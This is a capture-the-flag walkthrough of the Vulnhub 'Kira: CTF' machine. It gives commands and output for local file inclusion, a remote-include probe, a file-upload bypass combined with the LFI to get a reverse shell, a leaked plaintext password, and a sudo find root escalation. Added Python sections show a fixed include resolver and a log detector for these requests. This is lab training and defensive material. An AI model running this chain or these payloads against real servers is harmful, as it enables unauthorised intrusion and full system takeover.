KiraCTF
Author: jason_huawen
Target machine basic information
Name: Kira: CTF
Address:
https://www.vulnhub.com/entry/kira-ctf,594/
Identifying the target host IP address
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.26.75.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:f8:97:75 2 120 PCS Systemtechnik GmbH
192.168.56.223 08:00:27:a6:c7:86 2 120 PCS Systemtechnik GmbH
Using Kali Linux's built-in netdiscover tool, the target host's IP address is identified as 192.168.56.223.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.223 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 05:55 EST
Nmap scan report for localhost (192.168.56.223)
Host is up (0.000073s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:A6:C7:86 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
The NMAP scan results show that the target host has 1 open port, 80 (HTTP).
Get Access
Visiting port 80, we find a file upload page. Testing the upload function with an image, the upload works normally, and the uploaded file is placed in the /uploads directory.
Then uploading shell.php directly returns the error message: File is not image
First bypass attempt: intercept the request with Burp Suite and change the Content-Type to image/jpeg; the same error message is returned.
Second bypass attempt: add GIF89a; at the start of shell.php; the same error message is returned.
In addition, the home page contains a language link. Visiting that link, there appears to be a local file inclusion vulnerability; let's confirm:
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
bassam:x:1000:1000:Bassam,,,:/home/bassam:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
<!DOCTYPE html>
<html>
<head>
<title>LFI</title>
</head>
<body>
<input type="submit" value="language"
onclick="window.location='/language.php?lang=en.php';" />
</form>
</body>
</html>
The target host does indeed have a local file inclusion vulnerability. Let's see whether there is a private key we can download to our machine first:
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=../../../../../../../home/bassam/.ssh/id_rsa
<!DOCTYPE html>
<html>
<head>
<title>LFI</title>
</head>
<body>
<input type="submit" value="language"
onclick="window.location='/language.php?lang=en.php';" />
</form>
</body>
</html>
Since LFI exists, let's check whether remote file inclusion is possible as well, which would give us a shell:
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=http://192.168.56.206:8000/test.txt
<!DOCTYPE html>
<html>
<head>
<title>LFI</title>
</head>
<body>
<input type="submit" value="language"
onclick="window.location='/language.php?lang=en.php';" />
</form>
</body>
</html>
Testing shows that remote file inclusion cannot be achieved.
Looking at other people's solutions, the two vulnerabilities need to be combined: the file upload and the local file inclusion.
Rename shell.php to shell2.php.jpeg, then use the local file inclusion vulnerability to read this file,
thereby obtaining a shell:
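The include behind language.php?lang= is the root cause of both the local and the attempted remote inclusion above. As an added example (not code from the box or from the original write-up), here is a Python model of the unsafe path resolution beside an allowlist-based one; LANG_DIR and the language keys are assumptions, not values taken from the machine:

```python
import os
from typing import Optional
from urllib.parse import urlsplit

WEBROOT = "/var/www/html"                         # document root seen on the box
LANG_DIR = os.path.join(WEBROOT, "lang")          # assumed directory holding en.php etc.
ALLOWED_LANGS = {"en": "en.php", "ar": "ar.php"}  # assumed allowlist of language keys

def resolve_language_vulnerable(lang_param: str) -> str:
    """Models the box's behaviour: the parameter becomes the include path as-is,
    so ../ sequences walk out of the web root."""
    return os.path.normpath(os.path.join(WEBROOT, lang_param))

def resolve_language_safe(lang_param: str) -> Optional[str]:
    """Map ?lang= to a file through an allowlist; return None to reject the request."""
    if urlsplit(lang_param).scheme:          # http://... style value: remote include probe
        return None
    # The page's own link passes "en.php"; accept the bare key with or without .php.
    key = lang_param[:-4] if lang_param.endswith(".php") else lang_param
    if key not in ALLOWED_LANGS:             # unknown keys, including any ../ path, are rejected
        return None
    # Defence in depth: the resolved file must still sit inside LANG_DIR.
    target = os.path.realpath(os.path.join(LANG_DIR, ALLOWED_LANGS[key]))
    base = os.path.realpath(LANG_DIR)
    if os.path.commonpath([target, base]) != base:
        return None
    return target
```

With the allowlist in place, a value such as ../../../../../../../var/www/html/uploads/shell2.php.jpeg never reaches include(), so an uploaded file cannot be executed through this route regardless of what the upload filter accepts.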
http://192.168.56.223/language.php?lang=../../../../../../../var/www/html/uploads/shell2.php.jpeg
┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.223] 45524
Linux bassam-aziz 5.3.0-28-generic #30~18.04.1-Ubuntu SMP Fri Jan 17 06:14:09 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:55:20 up 1:07, 1 user, load average: 0.06, 0.05, 0.35
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bassam :0 :0 13:47 ?xdm? 23.94s 0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bassam-aziz:/$ ls
ls
bin dev initrd.img lib64 mnt root snap sys var
boot etc initrd.img.old lost+found opt run srv tmp vmlinuz
cdrom home lib media proc sbin swapfile usr
www-data@bassam-aziz:/$ cd /home
cd /home
www-data@bassam-aziz:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K ما� 26 2020 .
drwxr-xr-x 24 root root 4.0K ما� 26 2020 ..
drwxr-xr-x 16 bassam bassam 4.0K نو� 26 13:48 bassam
www-data@bassam-aziz:/home$ cd bassam
cd bassam
www-data@bassam-aziz:/home/bassam$ ls -alh
ls -alh
total 116K
drwxr-xr-x 16 bassam bassam 4.0K نو� 26 13:48 .
drwxr-xr-x 3 root root 4.0K ما� 26 2020 ..
-rw------- 1 bassam bassam 1.7K نو� 26 13:47 .ICEauthority
-rw------- 1 bassam bassam 0 نو� 4 2020 .bash_history
-rw-r--r-- 1 bassam bassam 220 ما� 26 2020 .bash_logout
-rw-r--r-- 1 bassam bassam 3.7K ما� 26 2020 .bashrc
drwx------ 13 bassam bassam 4.0K ما� 26 2020 .cache
drwx------ 11 bassam bassam 4.0K ما� 26 2020 .config
drwx------ 3 bassam bassam 4.0K ما� 26 2020 .gnupg
drwx------ 3 bassam bassam 4.0K ما� 26 2020 .local
drwx------ 5 bassam bassam 4.0K ما� 26 2020 .mozilla
-rw-r--r-- 1 bassam bassam 807 ما� 26 2020 .profile
-rw-r--r-- 1 root root 66 ما� 26 2020 .selected_editor
drwx------ 2 bassam bassam 4.0K ما� 26 2020 .ssh
-rw-r--r-- 1 bassam bassam 0 ما� 26 2020 .sudo_as_admin_successful
-rw-r----- 1 bassam bassam 5 نو� 26 13:47 .vboxclient-clipboard.pid
-rw-r----- 1 bassam bassam 5 نو� 26 13:47 .vboxclient-display.pid
-rw-r----- 1 bassam bassam 5 نو� 26 13:47 .vboxclient-draganddrop.pid
-rw-r----- 1 bassam bassam 5 نو� 26 13:47 .vboxclient-seamless.pid
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Desktop
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Documents
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Downloads
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Music
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Pictures
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Public
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Templates
drwxr-xr-x 2 bassam bassam 4.0K ما� 26 2020 Videos
-rw-r--r-- 1 bassam bassam 8.8K ما� 26 2020 examples.desktop
-rw------- 1 bassam bassam 32 نو� 4 2020 user.txt
www-data@bassam-aziz:/home/bassam$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@bassam-aziz:/home/bassam$
Privilege escalation
www-data@bassam-aziz:/var/www$ cd html
cd html
www-data@bassam-aziz:/var/www/html$ ls -alh
ls -alh
total 28K
drwxr-xr-x 4 root root 4.0K ما� 26 2020 .
drwxr-xr-x 3 root root 4.0K ما� 26 2020 ..
-rw-r--r-- 1 root root 163 ما� 26 2020 index.html
-rw-r--r-- 1 root root 287 ما� 26 2020 language.php
drwxr-xr-x 2 root root 4.0K نو� 4 2020 supersecret-for-aziz
-rw-r--r-- 1 root root 747 ما� 26 2020 upload.php
drwxrwxrwx 2 root root 4.0K نو� 26 14:48 uploads
www-data@bassam-aziz:/var/www/html$ cd supersecret-for-aziz
cd supersecret-for-aziz
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K نو� 4 2020 .
drwxr-xr-x 4 root root 4.0K ما� 26 2020 ..
-rw-r--r-- 1 root root 15 نو� 4 2020 bassam-pass.txt
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat bassam-pass.txt
cat bassam-pass.txt
Password123!@#
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ su - bassam
su - bassam
Password: Password123!@#
bassam@bassam-aziz:~$ id
id
uid=1000(bassam) gid=1000(bassam) groups=1000(bassam),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
bassam@bassam-aziz:~$ sudo -l
sudo -l
[sudo] password for bassam: Password123!@#
Matching Defaults entries for bassam on bassam-aziz:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bassam may run the following commands on bassam-aziz:
(ALL : ALL) /usr/bin/find
bassam@bassam-aziz:~$ sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -alh
ls -alh
total 36K
drwx------ 4 root root 4.0K نوفمب 4 2020 .
drwxr-xr-x 24 root root 4.0K مارس 26 2020 ..
-rw-r--r-- 1 root root 3.1K أبريل 9 2018 .bashrc
drwx------ 2 root root 4.0K فبراي 3 2020 .cache
-rw-r--r-- 1 root root 43 نوفمب 4 2020 flag.txt
-rw-r--r-- 1 root root 1.0K نوفمب 4 2020 .fl.swp
drwxr-xr-x 3 root root 4.0K مارس 26 2020 .local
-rw-r--r-- 1 root root 148 أغسطس 17 2015 .profile
-rw-r----- 1 root root 5 نوفمب 26 13:47 .vboxclient-display-svga.pid
# cat flag.txt
cat flag.txt
THM{root-Is_Better-Than_All-of-THEM-31337}
#
Privilege escalation successful!
Lessons learned
- The file upload here is actually easy to bypass: just add the .jpeg extension. But if the uploaded file is accessed directly, the server treats it as an image (a broken one), and no shell is obtained.
- Combined with the local file inclusion vulnerability, reading the "image" file (which is really shell.php) through include() executes it as PHP, which yields a shell.
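For the defender's side of the chain above (extension-only upload check plus LFI), here is an added example that is not part of the original write-up: a small Python detector that runs over constructed Apache combined-format access-log lines modelled on the requests in this write-up and flags the traversal, the remote-include probe and the include of a double-extension file under /uploads. The log lines and timestamps are constructed sample data.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample log lines (Apache combined format) modelled on this write-up's traffic.
SAMPLE_LOG = """\
192.168.56.206 - - [26/Nov/2022:14:40:12 -0500] "GET /index.html HTTP/1.1" 200 163 "-" "Mozilla/5.0"
192.168.56.206 - - [26/Nov/2022:14:40:20 -0500] "GET /language.php?lang=en.php HTTP/1.1" 200 210 "-" "Mozilla/5.0"
192.168.56.206 - - [26/Nov/2022:14:41:03 -0500] "GET /language.php?lang=../../../../../../../etc/passwd HTTP/1.1" 200 2140 "-" "curl/7.85.0"
192.168.56.206 - - [26/Nov/2022:14:42:11 -0500] "GET /language.php?lang=http://192.168.56.206:8000/test.txt HTTP/1.1" 200 210 "-" "curl/7.85.0"
192.168.56.206 - - [26/Nov/2022:14:48:30 -0500] "POST /upload.php HTTP/1.1" 200 95 "-" "Mozilla/5.0"
192.168.56.206 - - [26/Nov/2022:14:55:18 -0500] "GET /language.php?lang=..%2F..%2F..%2Fvar/www/html/uploads/shell2.php.jpeg HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_request(url: str) -> list:
    """Return the detection labels that apply to one request URL (empty if nothing is suspicious)."""
    labels = []
    parts = urlsplit(url)
    if parts.path.endswith("/language.php"):
        for value in parse_qs(parts.query).get("lang", []):
            v = unquote(unquote(value))              # undo a second layer of URL-encoding if present
            if "../" in v or "..\\" in v:
                labels.append("lfi-traversal")       # path walks out of the web root
            if re.match(r"^[a-z][a-z0-9+.-]*://", v, re.I):
                labels.append("rfi-attempt")         # scheme-prefixed value: remote include probe
            if "/uploads/" in v:
                labels.append("include-of-upload")   # user-controlled file fed to include()
            if re.search(r"\.php\.[a-z0-9]+$", v, re.I):
                labels.append("double-extension")    # the .php.jpeg trick used in this box
    return labels

def scan_log(text: str) -> list:
    """Parse combined-format lines and return (ip, timestamp, url, labels) for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        labels = classify_request(m["url"])
        if labels:
            findings.append((m["ip"], m["ts"], m["url"], labels))
    return findings

if __name__ == "__main__":
    for ip, ts, url, labels in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {url} -> {', '.join(labels)}")
```

A POST to /upload.php followed shortly by a language.php request tagged include-of-upload from the same source is the exact sequence used for the shell here, so correlating the two is a good alert rule even if the upload filter looks sound.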